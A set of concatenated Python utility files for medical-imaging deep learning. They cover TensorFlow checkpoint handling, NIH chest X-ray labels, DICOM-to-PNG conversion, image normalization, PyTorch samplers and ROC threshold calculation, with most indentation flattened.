"""Load model from a specific tensorflow ckpt file
There should be 3 files starting with `filepath`
.meta (contains the graph)
.index
.data (contains the weight)
"""
g = tf.Graph()
with g.as_default():
        sess = get_session_tf(fraction=gpu_memory_fraction)
saver = tf.train.import_meta_graph(filepath + '.meta')
saver.restore(sess, filepath)
print('Graph loaded from ckpt.')
return sess
def load_tf_checkpoint(model_path):
"""Load model from "latest" checkpoint
Args:
model_path: Checkpoint path
Returns:
Current session
"""
import tensorflow as tf
checkpoint_path = tf.train.latest_checkpoint(model_path)
meta_file = checkpoint_path + '.meta'
g = tf.Graph()
with g.as_default():
sess = get_session_tf()
saver = tf.train.import_meta_graph(meta_file)
saver.restore(sess, checkpoint_path)
return sess
def load_tf_frozen_graph(frozen_graph_filename):
"""Load model from frozen graph
Args:
frozen_graph_filename: File name of the frozen graph
Returns:
A TensorFlow graph containing the loaded model
"""
import tensorflow as tf
# We load the protobuf file from the disk and parse it to retrieve the
# unserialized graph_def
with tf.gfile.GFile(frozen_graph_filename, "rb") as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
# Then, we import the graph_def into a new Graph and returns it
with tf.Graph().as_default() as graph:
# The name var will prefix every op/nodes in your graph
# Since we load everything in a new graph, this is not needed
tf.import_graph_def(graph_def, name='')
sess = get_session_tf()
return sess
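# Hedged usage sketch (added for illustration, not from the original code): after
# loading a frozen graph, tensors are usually fetched from the session's graph by
# name. The tensor names 'input:0' and 'output:0' are placeholders and depend on
# how the graph was exported.
def _demo_run_frozen_graph(frozen_graph_filename, image_batch):
    sess = load_tf_frozen_graph(frozen_graph_filename)
    input_tensor = sess.graph.get_tensor_by_name('input:0')    # hypothetical name
    output_tensor = sess.graph.get_tensor_by_name('output:0')  # hypothetical name
    return sess.run(output_tensor, feed_dict={input_tensor: image_batch})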
<file_sep>"""This file contains utility functions used for manipulating checkpoint files"""
import tensorflow as tf
from tensorflow.python.tools import freeze_graph
import os
def genenerate_pb(sess, save_dir, ckpt_name, pb_file_name, output_node_name):
"""Generate .pb model file for loading in C++.
This function gets the network structure from sess and restores from checkpoint stored in ckpt_name.
Args:
sess:
save_dir:
ckpt_name:
pb_file_name:
output_node_name:
Returns:
None
"""
tf.train.write_graph(sess.graph_def, save_dir, pb_file_name + '.pbtxt', as_text=True)
g_new = tf.Graph()
with g_new.as_default():
input_graph = os.path.join(save_dir, pb_file_name + '.pbtxt')
input_checkpoint = os.path.join(save_dir, ckpt_name)
output_graph = os.path.join(save_dir, pb_file_name+'.pb')
freeze_graph.freeze_graph(input_graph=input_graph,
input_checkpoint=input_checkpoint,
output_graph=output_graph,
output_node_names=output_node_name,
input_saver='',
input_binary=False,
restore_op_name='save/restore_all',
filename_tensor_name='save/Const:0',
clear_devices='True',
initializer_nodes='')
def rename_variables_in_checkpoint(checkpoint_dir, replace_from, replace_to, add_prefix, renamed_checkpoint_dir='', dry_run=False):
"""Load varibales from a checkpoint file, rename them and save to a new file
Args:
checkpoint_dir: directory containing the old checkpoint file
        dry_run: if True, perform a dry run without renaming
Returns:
None
Usage:
python tensorflow_rename_variables.py --checkpoint_dir=path/to/dir --replace_from=scope1 \
--replace_to=scope1/model --add_prefix=abc/
will rename the variable scope1/Variable1 to abc/scope1/model/Variable1.
Note:
This function only helps to restore the variable values, but it does not contain any of the graph structure.
        The graph has to be rebuilt from scratch.
"""
g = tf.Graph()
with g.as_default():
checkpoint = tf.train.get_checkpoint_state(checkpoint_dir)
with tf.Session() as sess:
new_name_list = []
# latest = tf.train.latest_checkpoint(checkpoint_dir)
# saver = tf.train.import_meta_graph(latest + '.meta', input_map=None, import_scope='')
# saver.restore(sess, latest)
# writer = tf.summary.FileWriter('newmodel', sess.graph)
# saver.save(sess, os.path.join(checkpoint_dir, 'newmodel.ckpt'), global_step=9)
# print all nodes
# for node in tf.get_default_graph().as_graph_def().node:
# pass
# print('*')
# print(node.name)
print('load variable from {}'.format(checkpoint_dir))
for var_name, _ in tf.contrib.framework.list_variables(checkpoint_dir)[:]:
# Load the variable
var = tf.contrib.framework.load_variable(checkpoint_dir, var_name)
# Set the new name
new_name = var_name
if None not in [replace_from, replace_to]:
new_name = new_name.replace(replace_from, replace_to)
if add_prefix:
new_name = add_prefix + new_name
# dump new names to a text file
new_name_list.append(new_name)
with open('/tmp/tmp.txt', 'w') as f_out:
f_out.write('\n'.join(new_name_list))
if dry_run:
print('%s would be renamed to %s.' % (var_name, new_name))
else:
print('Renaming %s to %s.' % (var_name, new_name))
# Rename the variable
# `load_variable` does not add tensor to `GraphKeys.GLOBAL_VARIABLES`
# but `Variable()` or `get_variable()` do
var = tf.Variable(var, name=new_name)
if not dry_run:
# Save the variables
# print('***global vars: {}'.format(tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, None)))
saver = tf.train.Saver()
sess.run(tf.global_variables_initializer())
print('Saving to {}'.format(checkpoint.model_checkpoint_path))
# print('saver._var_list is {}'.format(saver._var_list))
if not renamed_checkpoint_dir:
renamed_checkpoint_dir = os.path.join(checkpoint_dir, 'renamed')
os.makedirs(renamed_checkpoint_dir, exist_ok=True)
writer = tf.summary.FileWriter(renamed_checkpoint_dir, sess.graph).close()
renamed_checkpoint_path = os.path.join(renamed_checkpoint_dir, 'renamed_checkpoint')
# os.makedirs(renamed_checkpoint_path)
saver.save(sess, renamed_checkpoint_path)
<file_sep>"""
This file contains utility functions used to convert between data formats
"""
import re
import numpy as np
def parse_coord_string(bbox_coord):
"""Get coord numbers from bbox_coord
    bbox_coord is in the format of `(x,y,w,h)`
Args:
bbox_coord:
Returns:
coord: a numpy array of coord
"""
fields = bbox_coord.replace(')', '').replace('(', '').split(',')
coord = np.array([int(field) for field in fields])
return coord<file_sep>"""This file contains utility functions specific to nih dataset"""
import pandas as pd
import re
try:
import dicom
except:
import pydicom as dicom
import os
import glob2
import glob
from projects.drutils import fileio
def get_name_list():
"""
# counts of images with different
Atelectasis: 11535
Cardiomegaly: 2772
Effusion: 13307
Infiltration: 19870
Mass: 5746
Nodule: 6323
Pneumonia: 1353
Pneumothorax: 5298
Consolidation: 4667
Edema: 2303
Emphysema: 2516
Fibrosis: 1686
Pleural_Thickening: 3385
Hernia: 227
No Finding: 60412
"""
NAME_LIST = ["Atelectasis", # 0
"Cardiomegaly", # 1
"Effusion", # 2
"Infiltration", # 3
"Mass", # 4
"Nodule", # 5
"Pneumonia", # 6
"Pneumothorax", # 7
"Consolidation", # 8
"Edema", # 9
"Emphysema", # 10
"Fibrosis", # 11
"Pleural_Thickening", # 12
"Hernia", # 13
"Tuberculosis", # 14
"Image_Type", # 15
"Costophrenic_Angle", # 16
"Pneumothorax_Apex"] # 17
return NAME_LIST
def generate_nih_dict():
"""Generate ddsm dictionary containing important constants of ddsm dataset
Keys:
'csv_path':
'basedir':
'all_dicom_dir':
'imagedir_list':
'maskdir_list':
Args:
Returns:
ddsm_dict: dictionary containing important constants of ddsm dataset
"""
nih_dict = {}
nih_dict['csv_path'] = r'/media/Data/Data02/Datasets/DR/NIH/Data_Entry_2017.csv'
nih_dict['NAME_LIST'] = ["Atelectasis", "Cardiomegaly", "Effusion", "Infiltration", "Mass",
"Nodule", "Pneumonia", "Pneumothorax", "Consolidation", "Edema",
"Emphysema", "Fibrosis", "Pleural_Thickening", "Hernia", "Tuberculosis"]
nih_dict['basedir'] = r'/media/Data/Data02/Datasets/DR/NIH/'
nih_dict['all_image_path_txt'] = r'/media/Data/Data02/Datasets/DR/NIH/images/All/images.txt'
nih_dict['annotation_dir'] = r'/media/Data/Data02/Datasets/DR/NIH/annotation/ver_2/images_Mass_or_Nodule/annotations/xmls'
return nih_dict
def get_image_path_from_filename(filename):
"""Get full path to image from filename
Args:
filename: image name, could be basename or barename (without ext)
Returns:
image_path
"""
# convert filename to barename
barename = os.path.basename(filename)
barename = os.path.splitext(barename)[0]
all_image_path_txt = generate_nih_dict()['all_image_path_txt']
image_path_list = fileio.read_list_from_txt(all_image_path_txt, field=0)
image_path_list = [path for path in image_path_list if barename in path]
print(image_path_list)
assert len(image_path_list) == 1, 'Found {} matching files!'.format(len(image_path_list))
image_path = image_path_list[0]
return image_path
def convert_label_to_one_hot_index(label):
"""Convert label to one-hot index with '|' as spliter
Example:
Input:
'Atelectasis|Cardiomegaly|Fibrosis'
Output:
'11000000000100'
"""
index = list('00000000000000')
NAME_LIST = generate_nih_dict()['NAME_LIST']
for i, name in enumerate(NAME_LIST):
if name in label:
index[i] = '1'
return ''.join(list(index))
def get_label_from_csv(image_name, df_or_csv, is_one_hot=True):
"""
Read label from csv given an image file. Only for NIH dataset.
Args:
image_name: basename of the image file path
df_or_csv: dataframe created from csv file, or the csv file
is_one_hot: optional, if true, convert string to one hot encoding
Return:
label: a string
"""
# generate df
if isinstance(df_or_csv, str):
try:
df = pd.read_csv(df_or_csv)
except:
raise IOError("Invalid csv file {}!".format(df_or_csv))
elif isinstance(df_or_csv, pd.core.frame.DataFrame):
df = df_or_csv
else:
raise ValueError("df_or_csv is not df nor csv!")
# look up image label in df
basename = os.path.basename(image_name)
# sometimes basename does not contain suffix
row = df.loc[df['Image Index'].str.contains(basename)]
try:
label = row["Finding Labels"].item()
except:
        print('This row has multiple occurrences \n{}'.format(row))
if is_one_hot:
label = convert_label_to_one_hot_index(label)
return label
def get_image_level_label_from_filename(image_name):
"""Given the image name, retrieve image-level label
Args:
image_name:
Returns:
label: image-level label
"""
csv_path = generate_nih_dict()['csv_path']
label_string = get_label_from_csv(image_name, csv_path, is_one_hot=False)
label = int("Mass" in label_string or "Nodule" in label_string)
return label
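# Hedged usage sketch (added for illustration, not from the original code):
# get_label_from_csv also accepts an in-memory DataFrame, which makes it easy to
# sanity check the label lookup without the real Data_Entry_2017.csv. The image
# name below is made up.
def _demo_get_label_from_csv():
    df = pd.DataFrame({'Image Index': ['00000001_000.png'],
                       'Finding Labels': ['Mass|Nodule']})
    raw = get_label_from_csv('00000001_000.png', df, is_one_hot=False)
    one_hot = get_label_from_csv('00000001_000.png', df, is_one_hot=True)
    return raw, one_hot  # ('Mass|Nodule', '00001100000000')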
<file_sep>import os
import numpy as np
from tqdm import tqdm
import cv2
import matplotlib.pylab as plt
from collections import defaultdict
# combine into lesion masks based on lesion ids
# lesion ids are in the format of `patient-view-lesion`
class LesionMaskCombiner(object):
"""This class combines lesions based on lesion id
Args:
config: config dict with the following keys
'write_flag': whether to write to disk
'output_dir': if write_flag the target to write to
            'lesion_keys': the keys to select and combine
"""
def __init__(self, config):
self.write_flag = config['write_flag']
self.output_dir = config['output_dir']
self.lesion_keys = config['lesion_keys']
self.verbose = config['verbose']
self.patient_masks_dict = defaultdict(list)
def _write(self):
if self.verbose:
print('writing {} images'.format(len(self.patient_masks_dict)))
for key, masks in tqdm(self.patient_masks_dict.items()):
mask_array = None
for mask_path in masks:
tmp_mask = plt.imread(mask_path, -1).astype(np.bool)
if mask_array is not None:
mask_array += tmp_mask
else:
mask_array = tmp_mask
mask_array = mask_array.astype(np.uint) * 255
output_path = os.path.join(self.output_dir, '{}_combined.png'.format(key))
cv2.imwrite(output_path, mask_array)
def _combine_dict(self, lesion_dict):
        assert not set(self.lesion_keys) - set(lesion_dict.keys()), 'some lesion_keys are missing from lesion_dict'
for lesion_key in self.lesion_keys:
mask_path = lesion_dict[lesion_key]
patient, view, lesion_id = lesion_key.split('-')
patient_key = '-'.join([patient, view])
self.patient_masks_dict[patient_key].append(mask_path)
def process(self, lesion_dict):
"""
Returns:
patient_masks_dict: each val is a list of masks corresponding to the patient
"""
if self.verbose:
print('processing {} lesions'.format(len(self.lesion_keys)))
# combine dict
self._combine_dict(lesion_dict)
# write to disk
if self.write_flag:
self._write()
return self.patient_masks_dict
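# Hedged usage sketch (added for illustration, not from the original code): paths
# and lesion ids below are made up; ids follow the `patient-view-lesion` convention
# noted above, and with write_flag=False nothing is written to disk.
def _demo_lesion_mask_combiner():
    config = {
        'write_flag': False,
        'output_dir': '/tmp/combined_masks',  # hypothetical output directory
        'lesion_keys': ['p001-CC-1', 'p001-CC-2'],
        'verbose': True,
    }
    lesion_dict = {
        'p001-CC-1': '/tmp/p001_CC_lesion1_mask.png',  # hypothetical mask paths
        'p001-CC-2': '/tmp/p001_CC_lesion2_mask.png',
    }
    combiner = LesionMaskCombiner(config)
    return combiner.process(lesion_dict)  # {'p001-CC': [<both mask paths>]}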
<file_sep>'''
data generator for the global local net
v0: for resnet34 only
v1: for global local with only local path, prepare the data for the input['local']
'''
import torch
from torch.utils.data import Dataset, DataLoader
import torchvision
from torchvision import transforms, utils
import pandas as pd
import random
import os
import math
# from skimage import io, transform
import numpy as np
import cv2
from time import time
from PIL import Image
from imgaug import augmenters as iaa
import matplotlib.pyplot as plt
plt.ion()
class dataconfig(object):
    def __init__(self, dataset='default', subset='0', **kwargs):
self.dataset = dataset
self.dir = r'E:\Xing\SDFY_skin\Crops_M'
self.csv = 'Gl_summery_csv_valid.csv'
self.subset = subset
self.csv_file = os.path.join(self.dir,self.csv)
class batch_sampler():
def __init__(self, batch_size, class_list):
self.batch_size = batch_size
self.class_list = class_list
self.unique_value = np.unique(class_list)
self.iter_list = []
self.len_list = []
for v in self.unique_value:
indexes = np.where(self.class_list == v)[0]
self.iter_list.append(self.shuffle_iterator(indexes))
self.len_list.append(len(indexes))
self.len = len(class_list) // batch_size
# print('self.len: ', self.len)
def __iter__(self):
index_list = []
for _ in range(self.len):
for index in range(self.batch_size):
index_list.append(next(self.iter_list[index % len(self.unique_value)]))
np.random.shuffle(index_list)
yield index_list
index_list = []
def __len__(self):
return self.len
@staticmethod
def shuffle_iterator(iterator):
# iterator should have limited size
index = list(iterator)
total_size = len(index)
i = 0
random.shuffle(index)
while True:
yield index[i]
i += 1
if i >= total_size:
i = 0
random.shuffle(index)
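# Hedged usage sketch (added for illustration, not from the original code):
# `batch_sampler` yields one full list of indices per iteration, so it plugs into
# DataLoader via the `batch_sampler` argument rather than `sampler`. The class
# list below is synthetic; `dataset` is any Dataset with matching length.
def _demo_batch_sampler(dataset):
    class_list = np.array([0, 1, 0, 1, 0, 1, 0, 1])  # one synthetic label per sample
    sampler = batch_sampler(batch_size=4, class_list=class_list)
    loader = DataLoader(dataset, batch_sampler=sampler)
    return loader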
class DataGenerator(Dataset):
def __init__(self, config=None,transform = None):
self.config = config
self.debug = False
self.df = self.parse_csv(self.config.csv_file, self.config.subset)
self.df.reset_index(drop=True, inplace=True)
self.transform = transform
def __len__(self):
print('len = {}'.format(len(self.df)))
return len(self.df)
def img_augmentation(self, img, seq_det):
img = img.transpose(2, 0, 1)
for i in range(len(img)):
img[i, :, :] = seq_det.augment_image(img[i, :, :])
img = img.transpose(1, 2, 0)
# img = seq_det.augment_images(img)
return img
def __getitem__(self, index):
# print(index)
img_path = self.df.loc[index, 'crop_1024_path']
# print(img_path)
# image = cv2.imread(img_path)
image = Image.open(img_path)
# label = self.df.loc[index,'Shape']
label = self.df.loc[index, 'BM']
# label = label.reshape(-1,1)
# landmarks = landmarks.reshape(-1, 2)
# sample = {'image': image, 'label': label}
if self.transform:
image = np.array(image)
image = cv2.resize(image, (384, 384), interpolation=cv2.INTER_NEAREST)
# dec = random.choice(range(2))
# if dec == 1 and self.df.loc[index, 'valid'] == 0:
if self.df.loc[index, 'valid'] == 0:
# print('{} is img_auged'.format(index))
seq = iaa.SomeOf((3, 6), [
iaa.Fliplr(0.8),
iaa.Flipud(0.8),
iaa.Multiply((0.8, 1.2)),
iaa.GaussianBlur(sigma=(0.0, 0.2)),
iaa.PiecewiseAffine((0.02, 0.06)),
iaa.Affine(
rotate=(-5, 5),
shear=(-5, 5),
scale=({'x': (0.8, 1.1), 'y': (0.8, 1.1)}) # to strentch the image along x,y axis
)
])
seq_det = seq.to_deterministic()
image = self.img_augmentation(image, seq_det=seq_det)
# image = transforms.ToPILImage()(image)
# plt.imshow(image),plt.show()
# image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# image = transforms.ToPILImage()(image)
image = self.transform(image)
mask = image[0,:,:]
img = image[2,:,:]
image = torch.stack([img,img,img])
if self.debug:
pass
return image,mask,label
@staticmethod
def parse_csv(csv_file, subset):
data_frame = pd.read_csv(csv_file)
data_frame = data_frame[data_frame['valid'] == int(subset)]
return data_frame
def show_landmarks(image, landmarks):
"""SHow image with landmarks"""
plt.imshow(image)
# plt.scatter(landmarks[:, 0], landmarks[:, 1], s=10, marker=".", c="r")
if __name__ == "__main__":
valconfig = {"dataset": "calc","subset": '1'}
val_config = dataconfig(**valconfig)
validation_data = DataGenerator(val_config,transform= transforms.ToTensor())
val_loader = DataLoader(validation_data, num_workers=1)
    for i, (images, masks, labels) in enumerate(val_loader):
print(i)
print(labels)
print(images.shape)
<file_sep>"""This file contains utility functions used for configuration"""
import json
import tensorflow as tf
import os
FLAGS = tf.app.flags.FLAGS
def maybe_load_from_json_and_overwrite(json_filepath):
if json_filepath:
assert os.path.isfile(json_filepath), "invalid json file!"
with open(json_filepath) as json_data:
d = json.load(json_data)
print('Keys loaded from json files')
for key, val in sorted(d.items()):
# skip keys starting with `_` (used for commenting)
if not key.startswith('_'):
FLAGS.__flags[key] = val
print('\t{:40s} : {}'.format(key, val))
<file_sep>"""
Conversion between different data formats
"""
import SimpleITK as sitk
import cv2
import functools
import glob2
import tensorflow as tf
import numpy as np
import os
from tqdm import tqdm
import matplotlib.pyplot as plt
from projects.drutils import fileio
from projects.drutils import augmentation
from projects.drutils import data
# parse list from args
def csv_to_list(csv_string, type=str):
return [type(item.strip()) for item in csv_string.strip().split(',') if item.strip()]
def scale_to_255(image_array):
"""Default normalizing functor to scale image to [0, 255]"""
a_min = min(image_array.min(), 0)
a_max = image_array.max()
image_array = (image_array - a_min)/ (a_max - a_min) * 255
return image_array
def dicom2png(dicom_filepath, png_filepath=None, normalize_functor=scale_to_255, dryrun=False):
"""Convert dicom image to png file
Args:
dicom_filepath:
png_filepath:
normalize_functor: normalizing function
Returns:
image_array: a numpy array containing the image
"""
image_array = data.get_pixel_array_from_dicom_path(dicom_filepath, to_bit=-1)
if normalize_functor:
image_array = normalize_functor(image_array)
if image_array.max() <= 1:
image_array = (image_array * 255).astype(np.uint8)
if not dryrun:
fileio.maybe_make_new_dir(os.path.dirname(png_filepath))
cv2.imwrite(png_filepath, image_array)
return image_array
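# Hedged usage sketch (added for illustration, not from the original code): the
# dicom path below is a placeholder; with dryrun=True the converted array is
# returned but nothing is written, which is handy for checking the normalization
# before a batch run.
def _demo_dicom2png(dicom_filepath='/tmp/example.dcm'):  # hypothetical input path
    image_array = dicom2png(dicom_filepath, png_filepath=None, dryrun=True)
    return image_array.shape, image_array.min(), image_array.max()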
def dicom2png_batch(dicom_search_path, png_filepath_replacer, nfiles=None, normalize_functor=scale_to_255):
"""Convert png to nii in batch mode
Args:
dicom_search_path: can be a glob2 search pattern or directory
png_filepath_replacer: a function to convert dicom filepath to png filepath
nfiles: max number of files to convert
normalize_functor: a function to normalize input images
Returns:
None
"""
if os.path.isdir(dicom_search_path):
file_list = glob2.glob(os.path.join(dicom_search_path, '**', '*dcm'))
else:
file_list = glob2.glob(dicom_search_path)
if nfiles is not None:
file_list = file_list[:nfiles]
for dicom_filepath in tqdm(file_list):
png_filepath = png_filepath_replacer(dicom_filepath)
print('{} --> {}'.format(dicom_filepath, png_filepath))
dicom2png(dicom_filepath, png_filepath, normalize_functor=normalize_functor)
def png2nii(png_filepath, nii_filepath):
"""Convert png to nii format
Args:
png_filepath:
nii_filepath:
Returns:
None
"""
image = sitk.ReadImage(png_filepath)
# make parent directory otherwise sitk will not write files
fileio.maybe_make_new_dir(os.path.dirname(nii_filepath))
sitk.WriteImage(image, nii_filepath)
# visualization
# img_array = sitk.GetArrayFromImage(image)
# plt.imshow(img_array)
def png2nii_batch(png_folder, nii_folder, nfiles=None):
"""Convert png to nii in batch mode
Args:
png_folder:
nii_folder:
Returns:
None
"""
assert os.path.isdir(png_folder), 'input is not a valid folder'
    file_list = glob2.glob(os.path.join(png_folder, '**', '*png'))
if nfiles is not None:
file_list = file_list[:nfiles]
for i, png_filepath in enumerate(file_list):
nii_filepath = png_filepath.replace(png_folder, nii_folder + os.sep)
nii_filepath = nii_filepath.replace('.png', '.nii')
print('{}: {} --> {}'.format(i, png_filepath, nii_filepath))
png2nii(png_filepath, nii_filepath)
def sitk_2d_to_3d(sitk_image_2d, is_binary=False):
"""Convert 2d simple itk image to 3d
Args:
sitk_image_2d: a 2d sitk image
Returns:
sitk_image_3d: a 3d sitk image with depth padded to 1
"""
png_array2D = sitk.GetArrayFromImage(sitk_image_2d)
if is_binary:
png_array2D = (png_array2D > 0).astype(np.uint8)
print(np.unique(png_array2D))
png_array3D = png_array2D.reshape((1,) + png_array2D.shape)
sitk_image_3d = sitk.GetImageFromArray(png_array3D)
return sitk_image_3d
def resize_png(png_file, target_h):
"""Resize png to target_h x target_h. Pad on the right by zero if non-square
Args:
png_file: input png file
target_h: target new height
Returns:
"""
output_png_file = png_file + '_{}x{}.png'.format(target_h, target_h)
image_array = plt.imread(png_file, -1)
h, w = image_array.shape
assert h >= w
target_w = int(target_h / h * w)
image_array_new = cv2.resize(image_array, (target_w, target_h), cv2.INTER_AREA)
canvas = np.zeros((target_h, target_h))
canvas[:target_h, :target_w] = image_array_new
plt.imshow(canvas)
print(output_png_file)
cv2.imwrite(output_png_file, canvas)
class ClaheConverter(object):
"""Batch apply CLAHE to all files in a search path
Args:
image_search_path:
output_dir:
"""
def __init__(self, image_search_path, output_dir):
self.image_files = glob2.glob(image_search_path)
self.output_dir = output_dir
@staticmethod
def apply_clahe(image_array, clipLimit=2.0, tileGridSize=(8,8)):
"""Apply Contrast Limited Adaptive Histogram Equalization
Args:
image_array:
clipLimit:
tileGridSize:
Returns:
image_array_clahe:
"""
clahe = cv2.createCLAHE(clipLimit=clipLimit, tileGridSize=tileGridSize)
image_array_clahe = clahe.apply(image_array)
return image_array_clahe
def deploy(self, clipLimit=2.0, tileGridSize=(8,8)):
fileio.maybe_make_new_dir(self.output_dir)
for image_file in tqdm(sorted(self.image_files)):
image_array = plt.imread(image_file, -1)
image_array = self.apply_clahe(image_array, clipLimit=clipLimit, tileGridSize=tileGridSize)
output_file_path = os.path.join(self.output_dir, os.path.basename(image_file))
cv2.imwrite(output_file_path, image_array)
class NormalizePathces(object):
"""Normalize patches
Args:
min_pct:
max_pct:
        debug: whether to output debugging messages
target_shape:
Methods:
process: process numpy array
batch_process: with file io
"""
def __init__(self, min_pct=0, max_pct=100, debug=False, target_shape=None):
self.min_pct = min_pct
self.max_pct = max_pct
self.debug = debug
self.target_shape = target_shape
def convert_to_gray(self, patch_array):
return cv2.cvtColor(patch_array, cv2.COLOR_BGR2GRAY)
def crop_or_pad(self, patch_array):
if self.target_shape is not None:
patch_array = augmentation.center_crop_or_pad(patch_array,
target_shape=self.target_shape)
return patch_array
def process(self, patch_array):
if np.percentile(patch_array, 0) < 5:
a_min = np.percentile(patch_array[patch_array > 5], 10)
else:
a_min = np.percentile(patch_array[patch_array > 5], self.min_pct)
a_max = np.percentile(patch_array[patch_array > 5], self.max_pct)
if self.debug:
print('amin {} amx {}'.format(a_min, a_max))
patch_array = np.clip(patch_array, a_min=a_min, a_max=a_max)
return (((patch_array - a_min) / (a_max - a_min)) * 255).astype(np.uint8)
def load_image(self, patch_path):
return fileio.load_image_to_array(patch_path)
def get_output_path(self, patch_path, path_converter_fn):
return path_converter_fn(patch_path)
def write(self, output_path, patch_array, write_rgb=False):
fileio.maybe_make_new_dir(os.path.dirname(output_path))
if write_rgb:
patch_array = np.dstack([patch_array] * 3)
cv2.imwrite(output_path, patch_array)
def batch_process(self, input_search_path, path_converter_fn=None, dryrun=True, write_rgb=False):
"""
Args:
input_search_path:
path_converter_fn:
dryrun:
write_rgb:
Returns:
"""
patch_paths = glob2.glob(input_search_path)
for patch_path in tqdm(patch_paths[:]):
patch_array = self.load_image(patch_path)
patch_array = self.convert_to_gray(patch_array)
patch_array = self.crop_or_pad(patch_array)
patch_array = self.process(patch_array)
output_path = self.get_output_path(patch_path, path_converter_fn)
if dryrun:
print('write to {}'.format(output_path))
else:
self.write(output_path, patch_array, write_rgb=write_rgb)
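# Hedged usage sketch (added for illustration, not from the original code): the
# search pattern and path_converter_fn below are placeholders. With dryrun=True the
# converter only prints the target paths, so the mapping can be verified before
# anything is written.
def _demo_normalize_patches():
    normalizer = NormalizePathces(min_pct=1, max_pct=99, target_shape=(512, 512))
    normalizer.batch_process(
        '/tmp/patches/**/*.png',  # hypothetical search path
        path_converter_fn=lambda p: p.replace('/patches/', '/patches_norm/'),
        dryrun=True)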
def binarize_mask(search_path, rename_fn=None):
if rename_fn is None:
rename_fn = lambda x: x.replace('mask.png', 'binary_mask.png')
for filepath in tqdm(glob2.glob(search_path)):
print(filepath)
image_array = plt.imread(filepath, -1)
binary_array = (image_array > 0).astype(np.uint8)
new_filepath = rename_fn(filepath)
cv2.imwrite(new_filepath, binary_array)
if __name__ == '__main__':
binarize_mask(
'/data/pliu/data/inbreast/calc_patches_ignore_single_point/train_mini/**/*mask.png',
rename_fn=None
)
<file_sep>import torch
import numpy as np
import copy
import re
is_torchvision_installed = True
try:
import torchvision
except:
is_torchvision_installed = False
import torch.utils.data
import random
def find_all_index(arr, item):
return [i for i, a in enumerate(arr) if a == item]
class BalancedBatchSampler(torch.utils.data.sampler.Sampler):
def __init__(self, dataset, labels=None, type='single_label'):
self.labels = labels
self.dataset = dict()
self.balanced_max = 0
# Save all the indices for all the classes
if type == 'single_label':
for idx in range(0, len(dataset)):
l = self._get_label(dataset, idx)
label = str(l)
if label not in self.dataset:
self.dataset[label] = list()
self.dataset[label].append(idx)
self.balanced_max = len(self.dataset[label]) \
if len(self.dataset[label]) > self.balanced_max else self.balanced_max
elif type == 'multi_label':
for idx in range(0, len(dataset)):
label = self._get_label(dataset, idx)
label_index = find_all_index(label, 1)
label_temp = np.zeros((len(label_index), len(label))).astype(int)
for i in range(len(label_index)):
label_temp[i, label_index[i]] = 1
for l in label_temp:
label = str(l)
if label not in self.dataset:
self.dataset[label] = list()
self.dataset[label].append(idx)
self.balanced_max = len(self.dataset[label]) \
if len(self.dataset[label]) > self.balanced_max else self.balanced_max
# Oversample the classes with fewer elements than the max
self.dataset_b = copy.deepcopy(self.dataset)
for label in self.dataset:
while len(self.dataset[label]) < self.balanced_max:
self.dataset[label].append(random.choice(self.dataset[label]))
self.keys = list(self.dataset.keys())
self.currentkey = 0
self.indices = [-1] * len(self.keys)
print(self.balanced_max, self.keys)
def __iter__(self):
while self.indices[self.currentkey] < round(0.8*self.balanced_max) - 1:
self.indices[self.currentkey] += 1
yield self.dataset[self.keys[self.currentkey]][self.indices[self.currentkey]]
self.currentkey = (self.currentkey + 1) % len(self.keys)
for label in self.dataset_b:
self.dataset[label] = []
while len(self.dataset[label]) < self.balanced_max:
self.dataset[label].append(random.choice(self.dataset_b[label]))
print(self.dataset[label])
self.keys = list(self.dataset.keys())
self.currentkey = 0
self.indices = [-1] * len(self.keys)
def _get_label(self, dataset, idx, labels=None):
if self.labels is not None:
return self.labels[idx].item()
else:
# Trying guessing
dataset_type = type(dataset)
if is_torchvision_installed and dataset_type is torchvision.datasets.MNIST:
return dataset.train_labels[idx].item()
elif is_torchvision_installed and dataset_type is torchvision.datasets.ImageFolder:
return dataset.imgs[idx][1]
elif 'BM' in dataset.df.columns:
label_str = dataset.df.BM[idx]
# elif 'Shape' in dataset.df.columns:
# label_str = dataset.df.Shape[idx]
# elif 'Margin' in dataset.df.columns:
# label_str = dataset.df.Margin[idx]
# label_ls = [int(i) for i in re.findall("\d+", label_str)]
try:
label_ls = int(label_str)
except:
print(dataset.df.crop_512_path[idx])
return label_ls
else:
raise Exception("You should pass the tensor of labels to the constructor as second argument")
def __len__(self):
return self.balanced_max * len(self.keys)<file_sep>"""
This file contains common utility functions for drawing ROC curves
"""
import ast
import glob
import glob2
import json
import re
import numpy as np
import os
# matplotlib.use('Agg') # use non-interactive backend
from matplotlib import pylab as plt
from sklearn import metrics
import itertools
from projects.drutils import fileio
def get_ax(rows=1, cols=1, size=(16, 16)):
"""Quick control of fig size and layout
Return a Matplotlib Axes array to be used in all visualizations in the notebook.
Provide a central point to control graph sizes.
Adjust the size attribute to control how big to render images
"""
_, ax = plt.subplots(rows, cols, figsize=(size[0] * cols, size[1] * rows))
return ax
def find_threshold(fpr, tpr, thresholds, target_fpr):
"""
Find the threshold corresponding to a target FPR (target_fpr)
Args:
fpr: List of FPR
tpr: List of TPR
thresholds: List of thresholds
target_fpr: Target FPR at which to operate
Returns:
target_thr: Threshold that produces the target FPR
target_tpr: TPR at the target FPR
"""
assert(len(fpr) == len(thresholds))
fpr = np.asarray(fpr)
thresholds = np.asarray(thresholds)
# Find index such that fpr[idx-1] < target_fpr < fpr[idx]
idx = fpr.searchsorted(target_fpr)
# print('idx=', idx)
if idx == len(fpr):
print("Target FPR out of range. Maximum FPR={} at threshold={}".format(fpr[-1], thresholds[-1]))
target_thr = thresholds[-1]
elif idx == 0:
print("Target FPR out of range. Minimum FPR={} at threshold={}".format(fpr[0], thresholds[0]))
target_thr = thresholds[0]
else:
left_fpr = fpr[idx-1]
right_fpr = fpr[idx]
interpolation_frac = (target_fpr - left_fpr) / (right_fpr - left_fpr)
left_tpr = tpr[idx-1]
right_tpr = tpr[idx]
target_tpr = left_tpr + (right_tpr - left_tpr) * interpolation_frac
left_thr = thresholds[idx-1]
right_thr = thresholds[idx]
target_thr = min(1.0, max(0.0, left_thr + (right_thr - left_thr) * interpolation_frac))
return target_thr, target_tpr
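# Hedged worked example (added for illustration, not from the original code): with
# the toy ROC points below, a target FPR of 0.375 falls halfway between 0.25 and
# 0.5, so the returned TPR and threshold are the linear interpolations 0.7 and 0.55.
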